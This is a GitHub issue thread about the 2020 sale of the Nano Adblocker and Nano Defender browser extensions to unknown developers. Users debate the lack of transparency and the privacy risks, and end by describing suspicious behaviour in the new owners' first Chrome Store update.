NanoAdblocker/NanoCore

[Announcement] Recent and upcoming changes to the Nano projects

jspenguin2017 opened this issue · 92 comments

Important updates and disclaimers: The WebStore listings are no longer under my control. I am not responsible for the actions of the new developer(s). If you feel concerned about the recent changes (please continue reading for more information), please remember that you can uninstall the extensions and/or find alternatives at any time.


As some of you might have noticed, Nano Adblocker is now months behind upstream. It became clear that I simply do not have enough time to properly maintain the Nano projects.

At the beginning, there were no backlogs. As the projects grew, I added a backlog system to better manage open issues. That was unfortunately not enough, so I added another level of backlog -- the triage queue. Then a third level. And a fourth one. Now the fourth level of backlog, the notification queue, has over 138 issues waiting for my attention. No matter how well I organize incoming issues, if I do not have enough time to look into them, I will simply fall further and further behind. With thousands of issues backlogged, it is only a matter of time before the Nano projects collapse.

And here comes the news. New developer(s) are in the process of acquiring Nano Adblocker and Nano Defender. Hopefully, they will be able to put an end to this backlog madness and finally give Nano Adblocker some real development time instead of constantly trying to catch up to upstream. The transition is still taking place, so I would like to ask for your patience. I will have more details about this in the upcoming days or weeks.

I would like to apologize for not being able to post an announcement earlier. I was extremely busy last week, and with all the additional things that I have to take care of to ensure a smooth transition, I fell quite a bit behind schedule. If you have any questions or concerns, please post them below. I am still trying to catch up, so please be patient while I find time to respond to your inputs.


Updates:

The new developer(s) said that they will create their own repositories and change links where appropriate.

The Edge store listings were changed to hidden.

NanoMeow/MDLMirror has been archived.

NanoMeow/UltimateMirror has been archived, and its visibility has been changed to private.

NanoMeow/MirrorEngine has been archived.

The Nano Defender repository has been archived.

Repositories in NanoAdblocker and NanoAdblockerLab organizations except NanoAdblocker/NanoCore have been archived.

The backend server running on legacy.hugoxu.com will no longer accept new reports from the Quick Issue Reporter.

NanoAdblocker/NanoCore and NanoMeow/QuickReports will be archived on 2020-10-15.


Please head over to my general purpose repository for further discussions: https://github.com/jspenguin2017/Snippets/issues

Speaking as (to the best of my knowledge) the highest-profile end-user of Nano Adblocker and Defender, the vague notion of "A team of Turkish developers" would definitely need a lot more clarification when the time is right to do so, before I'd feel safe and confident about this.

Speaking as (to the best of my knowledge) the highest-profile end-user of Nano Adblocker and Defender

That part was not necessary IMO.

(probably) Most users of Nano Adblocker/Defender care about their online privacy, so they will probably share your concern and desire for more information, as do I.

I meant that I was the only list maintainer of a major list that used Nano Adblocker as my main adblocker in my everyday life.

Before I was contacted by the new developer(s), I was planning on downscaling my projects due to time constraints. I had a totally different announcement drafted, in which I announced that some of the Nano projects will become unmaintained. When I started my projects, I never thought it would become this big, and lately, it has been too much for me. I was honestly hoping that someone would take the maintenance burden away from me. Having to choose between shutting down the projects and having someone else to take care of them, I chose the latter.

All this is still new to me, and I am still learning. I hope that I made the right choice and let's hope for the best.

Frankly it reminds me of the past taking over of uBlock. I don't need to know much about uAssets contributors, their years of contribution speak for themselves. We know nothing about the new developers.

There was one day where I was a new developer who had no contribution history at all.

And you grew your userbase organically, they are first and foremost acquiring your userbase, hence the scepticism.

Does the team of Turkish developers have any previous experience with adblocking in any shape or form?

Software development skills are transferable, and the skills needed to develop a product tend to be different than the ones needed to use a product. Of course developers need to know how to use the features they are developing, but the experience from developing a completely different extension would be much more important than the experience with adblocking. As an example, I know very little about dynamic filtering, I do not believe I ever used it and I am not too sure how it really works. However, this has not limited my ability to develop other parts of the extension.

@okiehsch That is a good point, I will see what kind of information I can share.

I am going to bed now. I am not sure what my schedule for next week will look like, so I apologize in advance if I cannot find time to properly reply to your comments until the weekend.

As an example, I know very little about dynamic filtering, I do not believe I ever used it and I am not too sure how it really works.

I would like to point out my view that Nano AdBlocker ("Nano") is pretty much uBO but with a different syntax highlighter and some configuration tweaks, most of the work that benefits Nano occurs in uBO. Surely the acquirers are aware of this?

In my opinion the best original feature of Nano as far as I am concerned is the ability to report issue (which requires maintaining an intermediate server), but for the rest I see it only as mostly uBO when leaving out the code editor and tweaks -- the sparse list of fixed issues confirms that the bulk of the commits benefiting Nano occurs in uBO.

I will see what kind of information I can share.

Your users installed your extension because they implicitly trusted you. It does not look good when you have to ask permission to disclose important information to those people who want to acquire your user base (essentially acquiring your user base's trust and a way to monetize uBO volunteers' work) before considering your user base's best interests, i.e. who is going to maintain the extension they use.

Additionally, why refer to the acquirer as "Turkish developers" instead of just naming the entity? The nationality of developers is irrelevant, but the entity and its track record are. I find it odd that you feel like mentioning their nationality which is irrelevant while leaving out the more important information about which entity is involved so that people can research it.

I am just going to ask point blank:

  • Which entity is acquiring your user base, control of your repos, and control of Chrome/Microsoft store publications?
  • Are the acquirers related in any way to eyeo or BetaFish?

As far as I am concerned at this point from what is being disclosed, what I see is that a yet-to-be-disclosed entity is planning to monetize the work and time of all uBO contributors indirectly by acquiring and monetizing Nano.

As a Firefox port maintainer, I would like to know whether the "Turkish developers" will take over the Firefox port as well or just the Chrome(ium)/Edge part. I am neutral to the decision, but if the upstream developer is changed, I need to think about whether I should detach from upstream and rename the project, maintain it for the new developers, or just abandon the Firefox port. It is unlikely I will continue to maintain it for the new developers without knowing their stance.

My initial motivation for maintaining this project is that I find this project useful and do not want it dead on Firefox (previously the original author and some other maintainers did maintain it on Firefox for a while). I try my best to turn myself from a normal user into a maintainer. I am still too far from being qualified as a developer. But in case I still need this project and the new developers do not take over the port (or I don't like their stance, just in case...), I will try my best to develop on my own (or maintain for them if I agree with the new developers).

However, as uBO has its own syntax highlighter and the new Firefox mobile does not support addons other than Recommended Extensions, I am even confused whether Nano Adblocker is still needed on Firefox if issue reporting is missing (or suspicious, as everyone is concerned). At best, the new developers are good (maybe better than me) and they will maintain the ports on Firefox better than before. At worst, either I will slowly develop on my own, or just use uBO and abandon it.

Update: I refuse to port for this project anymore.

I think that among the other original features of Nano Adblocker, {{nanoHref}} was the one I liked the most. It was much like {{origin}} for autoCommentFilterTemplate, but displayed the whole URL and not just the domain. This was very convenient when working on the Nano Placeholder Buster list in particular, and I'll see if I have some spare time to submit a request in the uBO issue tracker to add such a feature there as well.

Apart from that and Nano Filters / NanoMeow, I think Nano had a few additional included lists (5 Nano-branded lists + Adblock Warning Removal List), and a few additional scriptlets that currently aren't being used for much.

Nano's original advantages in 2018 that made me jump from uBO to Nano back then, like a then-revolutionary linter, and easier integration with Nano Defender, have pretty much been caught up to in 2020 by uBO.

Will the project stay open source?

They can't change the license, and they have to assign GPLv3 license to whatever code they add to the project.

I will be responding to comments in the order they are received. I am quite short on time, so please be patient.

@gorhill

There are a couple other things that I would like to address regarding your input, but I do not have time to write that tonight. So let's just get the burning questions out of the way.

The new developer(s) claimed that they are a pair of independent developers, they said that they are freelancers who are just starting out. Regarding affiliation with Eyeo and BetaFish, I asked them this morning, and they said no.

Update: To clarify, I still control the repos, the Edge store listings, the bot (NanoMeow) account, and the legacy.hugoxu.com domain. I will post an update if any of these change.

Regarding updates to the opening post: I will add disclaimers no matter who acquired my projects. This is not an indication that I no longer care about my projects and their users. Quite the opposite: The updates and disclaimers disclose what I can and cannot control, which gives the users a chance to make an informed decision.

Unfortunately, the projects do not have a good notification system, I linked this announcement in all relevant repos for better visibility, this is the best I can do right now. Hopefully most users would have a chance to see this thread and make a decision before the first update from the new developer(s) comes out.


I will address your comments when I have more time later this week or this weekend.

The developers are apparently named semagul aymak and nizametdin altuncu.

Nano Adblocker is controlled by the former and Defender by the latter. I can't find any information about them.

Why didn't they simply fork the projects? This suggests they wanted not the code base but the Nano brand and its user base. What concerns me is something like this: https://twitter.com/gorhill/status/1293233244826218498

I can't find any information about them.

So this is what is actually happening, I consider all else to be fluff:

"Two developers"[1] with no track record of ever contributing to the current project, or any related projects at least showing any sort of interest in content blocking or privacy or even loosely related topics, and with no visible internet presence to this day, paid an undisclosed amount in exchange of the user base and control of the GitHub repositories.

As of now, the user base has already been transferred (as per Chrome store listings), and in all likelihood a majority of those users will have no idea their installed extensions are no longer maintained by the person they originally trusted, at least implicitly, when they installed those extensions. Links to the privacy policy have been removed from the Chrome store listings (here, and here).

It goes without saying that the goal of these "two developers" is to monetize the two extensions. Those "two developers" will likely continue to import all the work from upstream, i.e. uBO, which is the result of long time volunteers investing their own free time and efforts day after day spanning years, which also contributed to making Nano AdBlocker what it is.

[1] Using quotes because nobody knows that there are really two actual developers given that nothing can be verified so far.

Looks like I will be removing everything related to Nano Core/Defender from my uBlock Origin preferences. I've seen how this goes with content-blocking extensions. They have usually turned around and monetized in some fashion. We don't need any more rubbish like that in the ecosystem.

@jspenguin2017, I honestly think it would have been better off that you shut down the projects and redirect users back to uBlock Origin instead of "sell" them down the river. As @gorhill has mentioned, it is entirely likely that existing extension users have no idea that ownership has changed hands. This is a significant privacy and security issue as extensions can auto-update.

In all honesty, I'm for uBlock Origin marking Nano lists as bad unless these situations can be addressed. Transferring the project over to unknown and unproven maintainers makes no sense.

@gorhill

Nano AdBlocker ("Nano") is pretty much uBO but with a different syntax highlighter and some configuration tweaks

In my opinion the best original feature of Nano as far as I am concerned is the ability to report issue

You are not wrong if you compare Nano with uBO today, but this was not always like this. Nano was the first adblocker to ever get a syntax highlighter. So I would say that the syntax highlighter is the best original feature since the ability to quickly and easily report issues is present in AdGuard, Adblock Plus, and probably other adblockers before Nano.

@gorhill

Your users installed your extension because they implicitly trusted you. It does not look good when you have to ask permission to disclose important information

I totally agree, it definitely does not look good for me. This is the first time someone acquired my projects, and honestly I am not too sure what I am supposed to do. If there is a next time, I will certainly be more prepared.

Ultimately, I have no control over what the new developer(s) do. So I updated all of my posts in this thread to be clearer and more neutral. This should hopefully help users to make properly informed decisions unaffected by their trust in me, implicit or otherwise.

I don't understand why people care about nano so much, I mean literally it's a ublock origin fork with some features

@enescglyn Because so many people use Nano.

I started noticing YouTube ads. Now I am here. I guess this is it for me. It was a good 2 years. Going back to uBlock Origin. Thanks to the nano developer I never noticed ads and ad detector.

@tazihad

The new developer(s) have yet to publish an update at the time of your post. Your issue is most likely unrelated to the changes announced here.

I don't think he was saying the changes were related. I think he just came here looking for a fix or reasoning, and then discovered this unfortunate issue and decided to give up on Nano. I too had a similar experience. I came to GitHub looking for an explanation on the lack of recent updates, and came across this, and I think this is probably it for me and Nano Adblocker too.

The lack of any announcements or transparency as well as the lack of information regarding the situation, plus the fact that the new maintainers have zero history of ever working on anything, let alone this project, just doesn't really make me want to keep using this.

Sure, now there is information available here, but unless you come looking for it, you'll probably never find out. Honestly, if there was a noticeable announcement in the plugin, like a new tab popping up saying "Hey, we're transferring ownership!" I would've been a lot happier. I also would've been a lot happier if the new maintainers had shown some prior interest in the project before acquiring it. That looks to me like they're just looking for some easy targets to acquire instead of actually caring about the project.

I plan to still watch out for any new developments in this issue, but I think it is most likely that many users who are informed of this will ditch Nano Adblock.

@jspenguin2017 I'm sorry to hear that you have come to the point where you no longer have enough time in your life to maintain a popular open source project.

I recall a similar situation a couple of years ago where you were extremely critical of me for not having time to maintain my uBlock Origin fork, with no understanding of what I was going through in my life at the time. Your manner was very superior, critical and unnecessarily disparaging of my work and dedication up until that point when life had got out of my control.

I hope your followers show you more grace, understanding, and consideration than you did to me. Especially in light of what seems to be a very dubious and opaque decision to transfer ownership to complete unknowns rather than bring on more collaborators or even just retire the project.

All the best for the future.

This is a really disappointing event. Perhaps many will not be aware that ownership has been transferred.

Decisions that are significantly less transparent are only disappointing.

From now on, I will use ublock. Thank you for your work.

@gorhill

why refer to the acquirer as "Turkish developers"

The new developer(s) claimed that they are in Turkey. I initially included this information so users can be aware of potential time zone differences and language barriers. I was able to communicate with the new developer(s) in English without too many issues, but I believe English is not their native language.

@LiCybora

The new developer(s) should contact you directly if they are interested in the Firefox version.

@gorhill

Links to the privacy policy have been removed

Privacy policy links are bound to developer accounts instead of each listing. It was not really "removed", more like "not added". If I recall correctly, it is not possible to publish updates without adding a privacy policy first.

@gorhill @Techman

before considering your user base's best interests

I honestly think it would have been better off that you shut down the projects

I have been thinking about this even before the new developer(s) contacted me. Is it in the users' best interests to abandon the project? When I announced that I will no longer maintain the Firefox version myself, I remembered that a lot of people were not happy about it. And that was when the project was over 50 times smaller. Considering only a dozen people voiced their concerns here, so far it looked like I made the right decision.

Or people are afraid of FUD, e.g. in Poland, I don't think anyone has talked about selling Nano more globally than this: https://github.com/MajkiIT/polish-ads-filter/discussions/17251

and on one portal I know 2 boys who are avid fans and 1 girl who is an avid fan, who advertise Nano very much wherever they can.

@nikrolls

Your manner was very superior, critical and unnecessarily disparaging of my work

I simply wanted to let you know about a setup that saved time for me. I am sorry that you took it this way.

@jspenguin2017

The new developer(s) should contact you directly if they are interested in the Firefox version.

Might you forward this issue link to them such that they can show up here? One of the reasons that many people feel insecure is that they never exist here and we only know them via you. No one can actually interact with them except you, even I have no way to reach them for questions. Who knows how long I will have to wait if I cannot contact them?

The situation can be much better if they show up and introduce themselves as new developers to their users, at least knowing two developers really do exist without using quotes. I don't see any reason to hide themselves from here, or more accurately, their users.

Considering only a dozen people voiced their concerns here, so far it looked like I made the right decision.

Do you seriously believe this? Most users of Nano do not check github and have no way of knowing that this transfer of ownership has taken place.

@LiCybora

Might you forward this issue link to them

Sure, I will do that.

@llacb47

Most users of Nano do not check github

The same can be said for the other announcement.

Is it in the users' best interests to abandon the project?

You really think that your users prefer you selling them to an unknown third party to you stop maintaining the extension?
If you had just given control away I could kind of see the point but logic dictates that the buyers will try to monetize the user base otherwise they could have simply forked.

Why do people install ad blockers? As the now former developer of a security and privacy extension, it should be expected of you that administrative issues are resolved with these reasons kept in mind.

Since changing store ownership is a known weakness that has been exploited in the past - through both guile and the sale of the product - I had expected more thought be put into this action. In my mind it's even more relevant, because the main browser this blocker was developed for isn't capable of stopping extension updates, leaving the average user both without knowledge of the change and unable to prevent themselves from potentially being taken advantage of.

Reading this thread, one thing has become very clear: you don't really know who you sold to. These two people may be fine examples of humanity and their desire to continue development may be entirely honest and altruistic. It's equally possible that they're fronts for some shady advertising companies who went into this arrangement with plans to subvert the existing user base of the extension or introduce other harmful changes. There's no proof or even indication either way, but the uncertainty is a problem.

In a case like this, at the very least I would have expected the developer to push an update to all users which informs them of the impending change of ownership. I'm not sure where else this notification has been posted to, but the average user can't be expected to follow GitHub issues for each and every of their software.

While there are no hard feelings from me for your actions - I sympathize with the lack of time, it's all too understandable that caring for a free product isn't easy nor rewarding most of the time - there's no doubt in my mind that your reputation has taken a hit from how you've handled this. Also, if you ever start another security/privacy project in the future, the privacy-conscious crowd will no doubt come back here and find a good reason not to use it.

That criticism aside, I wish you all the best in your future and leave here with a thanks for your efforts back when Nano was shiny and new. The (once) unique features of Nano aren't the draw they once were, so moving back to uBlock Origin will be easy.

@okiehsch

You really think that your users prefer you selling them to an unknown third party to you stop maintaining the extension?

If there was a clear candidate to be the new maintainer, I would have simply transferred the control over to them. The new developer(s) demonstrated their resourcefulness and dedication with their acquisition, and they are the best candidates that I currently know to be the new maintainers.

the buyers will try to monetize the user base

If the new developer(s) are able to provide meaningful contributions to the projects, and their monetization efforts are reasonable, I do not see what is wrong with that. If they do not provide meaningful contributions, or their monetization efforts are too aggressive, users will leave and the new developer(s) would have lost their time and money.

demonstrated their resourcefulness and dedication with their acquisition

Meaning they were willing to pay for it?
Note that I don't criticize you for selling, you have put a lot of time and work into this project and it's totally understandable that given the opportunity you take a financial reward.
I just think you should have made more of an effort to inform your users before you made that decision like ElDani82 mentions.

If the new developer(s) are able to provide meaningful contributions to the projects, and their monetization efforts are reasonable, I do not see what is wrong with that.

I agree but I doubt that there is a reasonable way to monetize privacy and security conscious users that would also be worth their investment.
Time will tell.

@ElDani82

As the now former developer of a security and privacy extension, it should be expected of you that administrative issues are resolved with these reasons kept in mind.

Nano is not a "security and privacy" extension. It is an adblocker. It is called Nano Adblocker after all. It happens to also block some trackers but that is not the focus, this is reflected in the filters policy of Nano Filters: tracking and privacy related issues are out of scope.

Having gone through a few mergers, I will add my feedback only from that perspective.

Typically, there is no announcement or confirmation of a sale until the sale is done. They may set a future date for when operations, assets, personnel, etc. are officially handed over but from the legal standpoint it is often done and the new company is officially in charge.

Once the sale is done, a joint press release is done by both parties. This will produce the following:

  • General Press Release announcing the sale and introducing the new owners
  • FAQ document that answers the top questions customers are likely to have about the sale
  • Internal documents to employees with more details and guidance on how to answer questions to customers.

The Press Release says what happened, who we are, and will try to reflect the benefit this will have on the product and customers. This is a joint statement approved by both parties so it's typically the same and released on both websites. Sometimes, one party may add a few more statements with their own take and is quite often approved by both parties to ensure messaging is aligned with each other. See the GitHub acquisition announcement by Microsoft as a great example.

The FAQ is compiled with what both companies feel will be the most common questions that their customers will have. Customers and employees are scared at this point. The FAQ is meant to address those fears as much as possible with a positive spin on how this will advance the product and improve customer lives. A lot of times, the new company doesn't want to address roadmap and overpromise so they will keep it high level.

The above documents are usually highly coordinated with legal and marketing teams writing it. Unfortunately, that is more difficult for a lone developer because they don't know what to do and may not have time either. English being a secondary language for a developer can add to the difficulty. Had this been a larger company acquisition by someone like RedGate or GitHub, they would have handled this for you. I know RedGate has done this many a time with small useful tools.

The only thing that can be done now is to get the developers to do the above and address their new customers. That is the single largest issue right now because we have not heard anything from them and so everything is speculation. The 2nd issue is the perceived value of what developers will bring to this project and they need to address that. The 3rd issue is how they expect to monetize it since the purchase implies they want to make their money back.

@okiehsch

it's totally understandable that given the opportunity you take a financial reward

I tried to stay away from the money topic because people tend to be sensitive to it. But I want to point out that I see the money as more of a safety mechanism. I will keep some of it to cover taxes, server costs, developer license costs, and other things. But I will consider donating some or even most of it back to the new developer(s) depending on what they do.

@dragonwolf83

Thank you for your great insights. I honestly did not think it would be this complex. I thought a quick announcement would be enough since that is what I used to do to announce changes.

I already asked [1] the new developer(s) to join the discussion and to introduce themselves, but I am not sure what their calendars look like.

[1] #362 (comment)

As a developer who makes some paid software, it's understandable to sell what you can get for a profit when you can get a profit.

However, the concerns for us users are as follows

  1. The buyer is not famous (it's suspicious that we cannot get much information when you research them.)
  2. Their intention to purchase Nano Adblocker (it is not generating any profit at the moment)
  3. The software can be used to read and "steal" data

As for 3, it's a critical issue. Something similar has happened in the past.

Since this fact is quickly buried as the conversation goes on, I will reiterate that after you leave out @jspenguin2017's development efforts, the bulk of what they will be monetizing is thousands of hours of works invested by volunteers over many years who are not a party to all this: uBO, uAssets (add to this all Crowdin contributors).

@gorhill

the bulk of what they will be monetizing is thousands of hours of works invested by volunteers

That is not wrong. But I do not see a problem with that if the new developer(s) make meaningful contributions themselves. The goal of the GPL license that you chose when you started uBO is so that people can share and build on each other's work, is it not?

I do not see a problem with that if the new developer(s) make meaningful contributions themselves

You have actual, credible examples of monetized content blockers based on and contributing back to a non-monetized upstream repo? I don't believe you believe your own statement about (still unknown) developers -- with no track record of contributing to anything -- contributing back, it's just a necessary rationalization once you accepted the deal. I too was offered deals, and a specific one suggested how it could be "framed" to rationalize the deal to the outside world. It's what they do to convince you to go through the deal.

AdBlocker Ultimate?

https://github.com/adblockultimate/AdBlocker-Ultimate-for-Firefox
https://github.com/adblockultimate/AdBlocker-Ultimate-for-Chrome

They have a paid app for Windows: https://adblockultimate.net/windows
And a browser with payment for Android: https://play.google.com/store/apps/details?id=s.sdownload.adblockerultimatebrowser

Only that it may be a mistake that AdGuard once had an open source code for extension/app - now both is hidden from world so possible see version after unzip crx / xpi and with reverse engineering only app for Windows/macOS/iOS.

AdBlocker Ultimate?

Owner of AdBlocker Ultimate app is contributing code to its own Adblock Ultimate extension -- how is this even a valid example when both ends are the same owner? Adblock Ultimate is the worst example you could find because it proves my point, it's based on AdGuard's code (see https://twitter.com/gorhill/status/1165747661691064322) and it's just a pretend repo.

Owner of AdBlocker Ultimate app is contributing code to its own Adblock Ultimate extension

"Contributing" as in "syncing with the latest AdGuard code".

Only that it may be a mistake that AdGuard once had an open source code for extension/app - now both is hidden from world

Ehm? Extensions and iOS version were never hidden and are on GH as well as a lot of other software we make.

@gorhill

contributing back to a non-monetized upstream

By contributions, I meant contributions in the broader sense. From my past experience, I know that you are very strict about what code goes into uBO. So I agree that it would not be reasonable to expect the new developer(s) to "contribute back" with you being the gatekeeper. To be clear, I am not saying whether being strict is good or bad, I am simply stating what I have observed over the years. Anyway, I consider developing new features, creating new filter lists, triaging and resolving issues and bugs, among other things to be contributions.

Considering only a dozen people voiced their concerns here, so far it looked like I made the right decision.

@jspenguin2017 Honestly, after reading this and later comments about your receiving financial compensation for the project and the implied intent for the new party to monetize, I have lost pretty much all respect for you and the project. While @okiehsch may not raise much criticism for wanting to sell out, I will.

As the (then) owner and maintainer of an extension with such extensive permissions, you have an obligation to protect the privacy and security of users. Why should existing users be subject to monetization practices that compromise their privacy and security because you wanted to sell the project and make money off of it? You lose all integrity by doing this. If anything happens to end-users because of your sale of the project, that can almost certainly be traced back to you as putting users in harm's way, to begin with. I don't want to be so dramatic as to say that you have "blood on your hands" for this, but I see this as an irreparable violation of trust.

Selling the efforts of volunteers in the upstream project (uBlock Origin) is also ridiculous. This kind of practice is toxic to the open-source ecosystem. It discourages users to contribute because their good-faith contributions are then monetized. Downstream monetized projects rarely contribute in an effective way to make up for this, at least in this context.

I absolutely agree with @Techman, even if you make your own contributions, I simply cannot see how it's okay to sell off something that isn't 100% your own work. Maybe if some people helped you bug test your own application or they contributed a few small fixes, but in this case, Nano is a relatively minor modification to uBlock. uBlock is what's been supplying Nano with the majority of its code for years now.

I found it especially funny though when you stated that "Nano is not a 'security and privacy' extension. It is an adblocker." If you haven't noticed, Nano is based on uBlock, but uBlock clearly states that it is "not an ad blocker", and that "uBlock Origin's main goal is to help users neutralize such privacy-invading apparatus", taken from the uBlock Origin Readme. So I guess Nano is indeed a "security and privacy" extension.

@PseudoResonance

So I guess Nano is indeed a "security and privacy" extension

It is baffling that some people try to tell me what my projects are.

Either way, I think I have provided enough information about the what and the why of recent changes. I have other things to work on so I might not keep monitoring this thread, but please feel free to continue the discussion below.

I would like to know whether the "Turkish developers" will take over the Firefox port as well or just the Chrome(ium)/Edge part.

After viewing many post about monetized, I decide not to port for "new developers" anymore because of the following reasons:

  • There is no point that the new developers never announce a single update when acquisition happen for a week, given that link to here is provided, those developers are neither fool nor newbie, and they can be communicated with English as mentioned from former developer.
  • Considering how inactive of ublock-LLC is given that acquirer getadblock also demonstrated their "resourcefulness and dedication with their acquisition" (in terms of money), but at least their acquirer do announce their acquisition and show up on GitHub. TBH, I really don't want to compare an addon that I port for two years with a shady thing...
  • Other than Chrome Store ownership changes, new developers information are nowhere to be found. If they are meant to take over, they should update the information, at least not link to old developer site anymore.
  • Combining above points, it is questionable that whether "new developers" exist.
  • Even they show up in last moment, if they plan to monetized the project, contributing or not, I become their free labor if I still port for them. I will not accept even they hire me with payment. This rule also applies to volunteers that contribute to the project.

I am sorry for not keeping myself neutral anymore. I am not 100% against monetizing project, but it is too dangerous for a product converted from non-monetizing without proper notice (users not on GitHub never know change of ownership), especially the functionality of quick issue reporter. I cannot find whether the control of quick issue reporter and Nano Filters are also passed, but it will be horrible if the issue you report is read by unexpected person, or the filter you are using suddenly whitelist with "acceptable ads". You may also argue that non-monetizing project can still perform this evil thing, but it is much unlikely when compare to a monetizing scenario which profits override users. It is more suspicious when "new developers" keep themselves stealth to monetize a project with voluntarily phone home capability [1]. Who knows what are their purposes?

I think things are already out of former developer's control. Things are irreversible anyway, neither he can force the new developers reveal nor undo the acquisition. Whether his decision right or not, his past efforts and contribution should not be annihilated. Thanks for making that great extension from the past and guide me how to manage an addon project. I might not join GitHub and become a maintainer if this project never exist.

[1] It is voluntarily as no information will be sent until user click send button.

Update: Their Chrome Store privacy policy is here, but still no words from them. I overlook it before posting this comment. This means they are active but purposefully keep themselves stealth.

Looks like they registered a new domain and smashed together a generic privacy policy with a template.

The new Privacy Policy: https://sites.google.com/view/nano-dev

But old - read all #362 (comment)

still based on stock template and no correct edited.

https://dev-nano.com (same as from "e-mail") have counter to 17 november 2020:

Screenshot_2020-10-13 today + 35 days 18 hours - Wolfram Alpha

So this project will continue after other devs take it? I don't care about privacy, I only want websites that don't harm my adblocker. I use two browsers one for work one for entertainment so I don't have a problem with privacy. I hope they won't drop this project.

@Salin1810 Personally, I think I will most likely switch to uBlock Origin. Without knowing what these new devs are doing, they may mess with the filters and let companies pay them to allow their ads or something. Even if you don't care about the possible privacy issues, I don't see how else these new developers plan to make their money back. Unless they're just genuinely really excited about working on this project, but it sure doesn't seem that way at the moment.

But ultimately, that's up to you I guess. You would lose Nano Defender, if you're also using that. I'm not sure how much of a difference it makes, but I'm assuming it does help, so not having it anymore could be disappointing and frustrating.

And @jspenguin2017, I apologize for being rude to you. I will not hide that I am extremely frustrated with your decision, but who knows, given that I also have no prior experience with this kind of situation, I could just as easily make a mistake as well. I guess I just hope that everyone here can learn something from this and move on with their lives.

I don't care about privacy

A reminder that when the browser warns you that an extension can "read and change all your data on the websites that you visit", it's not just for privacy concerns, it's especially for security concerns (example). It all comes down to trust, and the most basic rule of browser extensions is simply to never install extensions you do not explicitly trust. Trust is to be earned, not given. Dismissing security concerns with "I don't care about privacy" is just silly.

have counter to 17 november 2020:

I don't think so - it resets every time you reload the page :D

https://sites.google.com/view/nano-dev#h.1cqsve3a47lk

Types of Data collected:

Social Media

Complete details on each type of Personal Data collected are provided in the dedicated sections of this privacy policy or by specific explanation texts displayed prior to the Data collection.

Personal Data may be freely provided by the User, or, in case of Usage Data, collected automatically when using this Application

Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.

Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies – or of other tracking tools – by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.

Users are responsible for any third-party Personal Data obtained, published or shared through this Application and confirm that they have the third party's consent to provide the Data to the Owner.

Is that part of the template ?

@gwarser
Indeed, it appears they didn't even bother to set the countdown timer properly... They even left the default comments in. If the inputted date is before the current time, it defaults to a relative date instead of absolute. If this is the kind of care that they're going to put into working on Nano, I'd be concerned.

$('.cd100').countdown100({
	// Set Endtime here
	// Endtime must be > current time
	endtimeYear: 0,
	endtimeMonth: 0,
	endtimeDate: 35,
	endtimeHours: 18,
	endtimeMinutes: 0,
	endtimeSeconds: 0,
	timeZone: "" 
	// ex:  timeZone: "America/New_York", can be empty
	// go to " http://momentjs.com/timezone/ " to get timezone
});

Unless specified otherwise, all Data requested by this Application is mandatory and failure to provide this Data may make it impossible for this Application to provide its services. In cases where this Application specifically states that some Data is not mandatory, Users are free not to communicate this Data without consequences to the availability or the functioning of the Service.

Users who are uncertain about which Personal Data is mandatory are welcome to contact the Owner. Any use of Cookies – or of other tracking tools – by this Application or by the owners of third-party services used by this Application serves the purpose of providing the Service required by the User, in addition to any other purposes described in the present document and in the Cookie Policy, if available.

It was really worth selling users down the river, huh @jspenguin2017?

I forgot to mention this: This is exactly the kind of stuff that Google loves to see because it enables them to implement stricter and stricter policies for extensions, and also policies that cripple their capabilities. Thanks for contributing to the problem.

Is that part of the template ?

@uBlock-user They used something like https://www.termsfeed.com, the part you quote is used in generic templates.
Look at https://mindsetdirect.com/privacy-policy/ for example.

I am concerned.
I have been using Nano for years. I even typed passwords with the extension on due to my complete trust in @jspenguin2017 and @gorhill.
Now I just clean installed Windows, noticed Edge beta listings are gone and finally finding this.
I am worried about my passwords. I have very little understanding of coding, but reading this discussion I find that: they can't change the license and they must add license to whatever code they add, that @jspenguin2017 was in charge of listings, repositories etc. 8 days ago and that the new devs still have to publish an update for the extension.
So, should I change all my passwords or not?

hmm. I guess the new Developers name are [ana-sayfa]. And they have a play store account with BeeMobileApps name.

https://sites.google.com/view/nano-dev/ana-sayfa
https://sites.google.com/view/beemobileappsweightloss/ana-sayfa
https://play.google.com/store/apps/developer?id=BeeMobileApps&hl=en

Well, I already installed uBlock Origin. But this thread is popping up on my mail.

@novaz9 No worry since the packages have not been updated yet. Once they are updated, anybody will be able to look at their content to find out if there is anything wrong in them.

hmm. I guess the new Developers name are [ana-sayfa]. And they have a play store account with BeeMobileApps name.

https://sites.google.com/view/nano-dev/ana-sayfa
https://sites.google.com/view/beemobileappsweightloss/ana-sayfa
https://play.google.com/store/apps/developer?id=BeeMobileApps&hl=en

Well, I already installed uBlock Origin. But this thread is popping up on my mail.

Actually "ana sayfa" means "home page" in English

Or another random girl - Ana maybe "=" Anna.

Finally they are here: https://github.com/nenodevs/uBlockProtector
And their Chrome Store also update to 15.0.0.206

However, their update on Chrome Store does not match the one in their repository (not sure if forgot push or else). You can compare their GitHub and the below image.
image

Their Chrome Store version add a script call connect.js while do not reveal in their GitHub. Not sure if this violate GPLv3.

image

The new script they add seems minified (or maybe even obfuscated but I cannot sure now)(Thanks for uBlock-user answer). I am not a Chrome user and don't know whether there are so-call release note to explain why adding this. (Although I guess mostly not as they don't even have that on GitHub).

I don't think it's malicious, looks like an older version of the socket.io library.

You can use Chrome extension source viewer to inspect any extension, it has a built-in de-minifier.

You can use Chrome extension source viewer to inspect any extension, it has a built-in de-minifier.

Or this, by the same guy: https://robwu.nl/crxviewer/

So here is what I am seeing in the new Nano Defender 15.0.0.206:

Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named report is sent to https://def.dev-nano.com/, or in simple words the extension remotely checks whether you are using the extension dev tools -- which is what you would do if you wanted to find out what the extension is doing.

Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see:

At launch, the extension fetches something from https://def.dev-nano.com/, called listOfObject. Minor correction: At launch the extension listens to https://def.dev-nano.com/ for messages to populate listOfObject.

